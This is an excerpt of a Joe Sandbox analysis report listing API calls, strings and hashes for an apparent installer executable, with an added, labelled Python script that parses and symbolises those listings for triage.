                                                                            • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,00494450,?,?,?,004018B4), ref: 0040158B
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,00494450,?,?,?,004018B4), ref: 004015B1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Alloc$Free
                                                                            • String ID: ,#v
                                                                            • API String ID: 3668210933-3386492414
                                                                            • Opcode ID: effaea0c309239f47e4a30e9269409fffac43427cb9d7665a241d21997c4c65f
                                                                            • Instruction ID: 688e54e40afa48e252ad409736864ed84c60ecfa1e9a5b11fd7d95e45b94ba24
                                                                            • Opcode Fuzzy Hash: effaea0c309239f47e4a30e9269409fffac43427cb9d7665a241d21997c4c65f
                                                                            • Instruction Fuzzy Hash: 30F0C2B1640320AAEB315A294C85F133AD8DBC5794F1040B6BE09FF3DAD6B8980082AC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%
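Every function record in this listing uses the same line shape for its API calls: "• Api.MODULE(arg,arg,...), ref: ADDR", sometimes prefixed with "Part of subcall function XXXXXXXX:", sometimes with no argument list at all (GetDesktopWindow.USER32 ref: ...), and with every numeric argument printed as an 8-hex-digit stack word. Reading the security-relevant detail out of that by eye (is 00000004 in the VirtualAlloc call PAGE_READWRITE or PAGE_EXECUTE_READWRITE? is 80000002 HKLM? what is message 0000001D sent to window 0000FFFF?) is error-prone, so the following Python script, an added example that is not part of this report or of Joe Sandbox, parses the listing into per-function call lists, symbolises the constants that matter for triage, and applies three small rules: LoadLibrary + GetProcAddress late binding, executable versus non-executable allocations, and HWND_BROADCAST messages. The sample text is constructed from API lines in this report; the constant tables are Windows SDK values. One assumption is the example's own: the first N printed words are taken to be the API's real parameters (the sandbox prints further stack words after them, which the script leaves as raw hex).

```python
"""Parse and symbolise the per-function "APIs" listings of a Joe Sandbox report.
Added example, not part of the report or of Joe Sandbox. Assumption: the first
N hex words the sandbox prints are the API's real parameters (it prints further
stack words after them, which are left as raw hex)."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample, assembled from API lines in this report (five functions).
SAMPLE = r"""APIs
• LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,0049298F), ref: 00460B03
• GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00460B09
APIs
• VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,00494450,?,?,?,004018B4), ref: 00401566
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004), ref: 004015B1
APIs
  • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001), ref: 0042DC70
• RemoveFontResourceA.GDI32(00000000), ref: 00454556
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045456A
APIs
• GetDesktopWindow.USER32 ref: 00413CB6
APIs
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408B26
"""
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")

# Windows SDK constants for the few parameters worth symbolising.
MEM = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
PAGE = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
        0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
HKEY = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
HWND = {0xFFFF: "HWND_BROADCAST"}
MSG = {0x1D: "WM_FONTCHANGE", 0x18E: "LB_GETTOPINDEX", 0x1A0: "LB_SETITEMHEIGHT", 0x1A1: "LB_GETITEMHEIGHT"}
MB = {0x10: "MB_ICONERROR", 0x2000: "MB_TASKMODAL"}
DECODERS = {"VirtualAlloc": {2: MEM, 3: PAGE}, "VirtualFree": {2: MEM}, "RegOpenKeyExA": {0: HKEY},
            "MessageBoxA": {3: MB}, "SendMessageA": {0: HWND, 1: MSG}, "SendNotifyMessageA": {0: HWND, 1: MSG}}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                     # int for 8-hex-digit words, str otherwise ("?" = unknown)
    ref: str
    subcall: Optional[str] = None  # set when listed as "Part of subcall function"


def parse_args(raw):
    words = [w.strip() for w in raw.split(",")] if raw else []
    return [int(w, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", w) else w for w in words]


def parse_report(text):
    """One list of ApiCall per function; every 'APIs' header starts a new function."""
    functions, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            functions.append(current)
        elif (m := LINE_RE.match(line)) and current is not None:
            current.append(ApiCall(m["api"], m["mod"], parse_args(m["args"]), m["ref"], m["sub"]))
    return functions


def decode_const(value, table):
    """Exact match, else bit-flag decomposition (0x2010 -> MB_ICONERROR|MB_TASKMODAL), else hex."""
    if value in table:
        return table[value]
    names = [name for bit, name in table.items() if value & bit == bit]
    return "|".join(names) if names else f"0x{value:X}"


def decode_call(call):
    tables = DECODERS.get(call.api, {})
    out = [a if not isinstance(a, int) else decode_const(a, tables[i]) if i in tables else f"0x{a:X}"
           for i, a in enumerate(call.args)]
    return f"{call.api}({', '.join(out)})"


def findings(calls):
    """Cheap triage over one function: late binding, allocation protection, broadcasts."""
    notes, apis = [], {c.api for c in calls}
    if "GetProcAddress" in apis and any(a.startswith("LoadLibrary") for a in apis):
        libs = [a for c in calls if c.api.startswith("LoadLibrary")
                for a in c.args if isinstance(a, str) and a.lower().endswith(".dll")]
        notes.append("dynamic import resolution via " + ", ".join(libs))
    for c in calls:
        if c.api == "VirtualAlloc" and len(c.args) > 3 and isinstance(c.args[3], int):
            prot = decode_const(c.args[3], PAGE)
            notes.append(("executable" if "EXECUTE" in prot else "non-executable") + f" allocation ({prot})")
        if c.api in ("SendMessageA", "SendNotifyMessageA") and c.args[:1] == [0xFFFF]:
            notes.append(f"broadcast of {decode_const(c.args[1], MSG)} to all top-level windows")
    return list(dict.fromkeys(notes))  # de-duplicate, keep order


if __name__ == "__main__":
    for n, calls in enumerate(parse_report(SAMPLE), 1):
        print(f"function {n}:")
        for c in calls:
            print(f"  {decode_call(c)}  @ {c.ref}" + (f" [in subcall {c.subcall}]" if c.subcall else ""))
        for note in findings(calls):
            print(f"  -> {note}")
```

Run against the sample, the rules flag nothing unusual in these functions: the 0x100000-byte region is reserved PAGE_READWRITE and later released with MEM_RELEASE, not mapped executable; the WM_FONTCHANGE broadcast after RemoveFontResourceA is the documented way to tell other top-level windows that a font was removed; and resolving SHPathPrepareForWriteA from shell32.dll at run time is ordinary late binding for an API that is not present on every Windows version. Treat the decoded output as triage context, not as evidence either way; a verdict on the sample rests on the report's signatures and on behaviour outside these call sequences.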

                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,00459AD2,?,?,?,?,?,00000000,00459AF9), ref: 00454540
                                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,00459AD2,?,?,?,?,?,00000000), ref: 00454549
                                                                            • RemoveFontResourceA.GDI32(00000000), ref: 00454556
                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045456A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                            • String ID:
                                                                            • API String ID: 4283692357-0
                                                                            • Opcode ID: 96fa512f3f662ed87c37535a3766b553a9c327ccaabb4965c9ab73448b41aaf6
                                                                            • Instruction ID: 1eb0840f44da6d39683793e989569f75594476954d085f3704b84519527e0fd3
                                                                            • Opcode Fuzzy Hash: 96fa512f3f662ed87c37535a3766b553a9c327ccaabb4965c9ab73448b41aaf6
                                                                            • Instruction Fuzzy Hash: B9F054B574535037EA10B6B69C47F1B228C8F94749F10483BB600EF2C3D97CD904962D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 0046B729
                                                                            Strings
                                                                            • Unsetting NTFS compression on directory: %s, xrefs: 0046B70F
                                                                            • Failed to set NTFS compression state (%d)., xrefs: 0046B73A
                                                                            • Setting NTFS compression on directory: %s, xrefs: 0046B6F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                            • API String ID: 1452528299-1392080489
                                                                            • Opcode ID: d53215409e502109a5a1d7da470d817492eeecdd52408c6bdcbefe281b75e759
                                                                            • Instruction ID: 8a2dc4ed195109a8471c1236a5c58557194bf09444f2f11eb0036fe1721b7234
                                                                            • Opcode Fuzzy Hash: d53215409e502109a5a1d7da470d817492eeecdd52408c6bdcbefe281b75e759
                                                                            • Instruction Fuzzy Hash: 6E014431D0824866CF04D7ED90512EDBBF4DF49305F54C5AFA454DB242EBB9094987DB
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0046C019
                                                                            Strings
                                                                            • Unsetting NTFS compression on file: %s, xrefs: 0046BFFF
                                                                            • Setting NTFS compression on file: %s, xrefs: 0046BFE7
                                                                            • Failed to set NTFS compression state (%d)., xrefs: 0046C02A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                            • API String ID: 1452528299-3038984924
                                                                            • Opcode ID: 64252f671433613891e1a7440361f40b2ffce42b5703e84520e84a0d5a72c339
                                                                            • Instruction ID: f21eca6685929eef9c1991e0f0882ebce6d76680defdff1bfc8b5815b9b403a8
                                                                            • Opcode Fuzzy Hash: 64252f671433613891e1a7440361f40b2ffce42b5703e84520e84a0d5a72c339
                                                                            • Instruction Fuzzy Hash: FD014430E08248AACB14D7ED90912BDBBF49F09304F54C1AFA494DB242EAB905088B9B
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CountSleepTick
                                                                            • String ID:
                                                                            • API String ID: 2227064392-0
                                                                            • Opcode ID: 7f9be6c62347cb85835d29a1a4366730904a4622375b7e81926710e7e3913ef5
                                                                            • Instruction ID: 600cfe0a74c4f2c1bd3ebedcfd2d7a6b72f2f4999c435aba37b1015e9725878a
                                                                            • Opcode Fuzzy Hash: 7f9be6c62347cb85835d29a1a4366730904a4622375b7e81926710e7e3913ef5
                                                                            • Instruction Fuzzy Hash: B5E0E53170D501498A2031AE988A6AB4689CA89324B1985FFF48CE6242C4184C05C76F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000008,?,0047B069,?,?,00000001,00000000,00000002,00000000,0047B8F6,?,?,?,?,?,00492A60), ref: 00473429
                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?,0047B069,?,?,00000001,00000000,00000002,00000000,0047B8F6), ref: 0047342F
                                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,0047B069,?,?,00000001,00000000,00000002,00000000,0047B8F6), ref: 00473451
                                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,0047B069,?,?,00000001,00000000,00000002,00000000), ref: 00473462
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                            • String ID:
                                                                            • API String ID: 215268677-0
                                                                            • Opcode ID: 5e6959b0aa08eab338446373c25635829722180206a086ec912edd4ecd6bffc1
                                                                            • Instruction ID: b2e67a826371a673a356ac5d6eaa9b5bb997f149e1c9fc538a60d49279a5b6ce
                                                                            • Opcode Fuzzy Hash: 5e6959b0aa08eab338446373c25635829722180206a086ec912edd4ecd6bffc1
                                                                            • Instruction Fuzzy Hash: 99F03061644301ABD600EAB5CC82E9B77DCEB44754F04883A7E98D72C1D679DD08AB66
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetLastActivePopup.USER32(?), ref: 004241BC
                                                                            • IsWindowVisible.USER32(?), ref: 004241CD
                                                                            • IsWindowEnabled.USER32(?), ref: 004241D7
                                                                            • SetForegroundWindow.USER32(?), ref: 004241E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                            • String ID:
                                                                            • API String ID: 2280970139-0
                                                                            • Opcode ID: 45cc8346385df99cd35dc406275c17b3484034b80334a27cef1f15798a1a4062
                                                                            • Instruction ID: 7a261241521d5f36110480f60a41559dbc21bd8b6604a945fb8666e4bf107b55
                                                                            • Opcode Fuzzy Hash: 45cc8346385df99cd35dc406275c17b3484034b80334a27cef1f15798a1a4062
                                                                            • Instruction Fuzzy Hash: 0DE08699B06531139E31FA251885ABB25ACCD54B883C60127BC04F7243DF1CCFA0C1AC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 00466DD9
                                                                            • EnableMenuItem.USER32(00000000,00000000,00000000), ref: 00466DDF
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$EnableItemSystem
                                                                            • String ID: CurPageChanged
                                                                            • API String ID: 3692539535-2490978513
                                                                            • Opcode ID: 02cdd856f79da87946ce3be0036284d170d79325171fd6f69fc8e8dc4402c0b0
                                                                            • Instruction ID: ce10d549b0c21605a6af546479ee9e12edac585882682887e1d5a1eed24c9042
                                                                            • Opcode Fuzzy Hash: 02cdd856f79da87946ce3be0036284d170d79325171fd6f69fc8e8dc4402c0b0
                                                                            • Instruction Fuzzy Hash: E5A10734700104DFD711DB69D985EAD77F5EF89304F2640BAE8049B362EB39AE41DB49
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 004248D5
                                                                            • WaitMessage.USER32(00000000,004249C9,?,?,?,?), ref: 004249A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CursorMessageWait
                                                                            • String ID: )I
                                                                            • API String ID: 4021538199-2943873603
                                                                            • Opcode ID: bb51d86f2fc56d9b79fd6e24fc7d3904fa82574d4d9fbf57c4ed1671c248813e
                                                                            • Instruction ID: 3684f1357379c85a98af1ae3a8e7e482b9cd7f2697edbb5586c2bc0712e370a9
                                                                            • Opcode Fuzzy Hash: bb51d86f2fc56d9b79fd6e24fc7d3904fa82574d4d9fbf57c4ed1671c248813e
                                                                            • Instruction Fuzzy Hash: 5D31D4B07002249BCB21EF39D48179FB7B5EFC8304F96456AEC049B385DB789D80CA99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044F895
                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044F8C6
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteMessageSendShell
                                                                            • String ID: open
                                                                            • API String ID: 812272486-2758837156
                                                                            • Opcode ID: 39befbd8bfe4d04ca9f0ad22fe8eee91a23e6983e02579a401e517ae9ce6b0ad
                                                                            • Instruction ID: 7c1a3c7c8ebbf10466e07294f195938a80af8ea232d4303b03533db3f0a8dc42
                                                                            • Opcode Fuzzy Hash: 39befbd8bfe4d04ca9f0ad22fe8eee91a23e6983e02579a401e517ae9ce6b0ad
                                                                            • Instruction Fuzzy Hash: ED213270E00644AFEB00EF69C881A9EB7F8EB44704F60857BF501FB391D7789A498A58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • Failed to proceed to next wizard page; showing wizard., xrefs: 004687E1
                                                                            • Failed to proceed to next wizard page; aborting., xrefs: 004687CD
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                            • API String ID: 0-1974262853
                                                                            • Opcode ID: cfba3478a7359d3cbe5014acf16baf13cc054a1082433b199a19fc1bb0af4262
                                                                            • Instruction ID: f19096d41c4aac5864f1bb8ccf8968ed334c7e4c4402baa3f8ad6812cbe3c8f9
                                                                            • Opcode Fuzzy Hash: cfba3478a7359d3cbe5014acf16baf13cc054a1082433b199a19fc1bb0af4262
                                                                            • Instruction Fuzzy Hash: 2621B074A04204AFD701EBA9D985E99B7F4EF45315F2541BBF404AB392EB38AE40CB1D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00453A94
                                                                            • GetLastError.KERNEL32(0000003C,00000000,00453ADD,?,?,00000001,00000001), ref: 00453AA5
                                                                              • Part of subcall function 004536EC: WaitForInputIdle.USER32(00000001,00000032), ref: 00453718
                                                                              • Part of subcall function 004536EC: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 0045373A
                                                                              • Part of subcall function 004536EC: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00453749
                                                                              • Part of subcall function 004536EC: CloseHandle.KERNEL32(00000001,00453776,0045376F,?,00000031,00000080,00000000,?,?,00453AC7,00000080,0000003C,00000000,00453ADD), ref: 00453769
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Wait$CloseCodeErrorExecuteExitHandleIdleInputLastMultipleObjectsProcessShell
                                                                            • String ID: <
                                                                            • API String ID: 35504260-4251816714
                                                                            • Opcode ID: 5d562b07ccb6d432d664981823a10e5781889d8990a1d6319f014274b2d54e6a
                                                                            • Instruction ID: 731c30c279f4aac689e5cd79ec505c098efd6bab46e48a29a8149d1d071dcc10
                                                                            • Opcode Fuzzy Hash: 5d562b07ccb6d432d664981823a10e5781889d8990a1d6319f014274b2d54e6a
                                                                            • Instruction Fuzzy Hash: 862186B0600249EFDB10DF65D88269E7BE8EF04346F50443AF840E7381D7789E49CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RtlEnterCriticalSection.KERNEL32(00494420,00000000,)), ref: 004025C7
                                                                            • RtlLeaveCriticalSection.KERNEL32(00494420,0040263D), ref: 00402630
                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(00494420,00000000,00401A82,?,?,0040222E,022476A0,00001314,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(00494420,00494420,00000000,00401A82,?,?,0040222E,022476A0,00001314,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,00494420,00000000,00401A82,?,?,0040222E,022476A0,00001314,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(00494420,00401A89,00000000,00401A82,?,?,0040222E,022476A0,00001314,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                            • String ID: )
                                                                            • API String ID: 2227675388-1084416617
                                                                            • Opcode ID: a331b4afa8f9150ecfd6d625d08057cf3307c320ac16a2d40e23e2d78c6b5bf2
                                                                            • Instruction ID: cb504dffcee3235a55bc4261ddae651f31054f91a8da10d6123b862062c9523b
                                                                            • Opcode Fuzzy Hash: a331b4afa8f9150ecfd6d625d08057cf3307c320ac16a2d40e23e2d78c6b5bf2
                                                                            • Instruction Fuzzy Hash: A71101317042046FEB25AB799F1AB2A6AD4D7D575CB24087FF404F36D2D9BD8C02826C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00490A87
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window
                                                                            • String ID: /INITPROCWND=$%x $@
                                                                            • API String ID: 2353593579-4169826103
                                                                            • Opcode ID: cb4eaf9d1a0e90ba4be06c901a3c5ec9da01a08ec724fec4d2fbca150f0c6e2b
                                                                            • Instruction ID: 8fbfb881858f58605f6fc747a7b473234afd2d79c1019554ad0381eeacbb4dac
                                                                            • Opcode Fuzzy Hash: cb4eaf9d1a0e90ba4be06c901a3c5ec9da01a08ec724fec4d2fbca150f0c6e2b
                                                                            • Instruction Fuzzy Hash: 1611AF71A043099FDF05EBA4D841BAEBFF8EB59318F11447BE504E7281D63CAA05CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                            • SysFreeString.OLEAUT32(?), ref: 00446D5A
                                                                            Strings
                                                                            Memory Dump Source
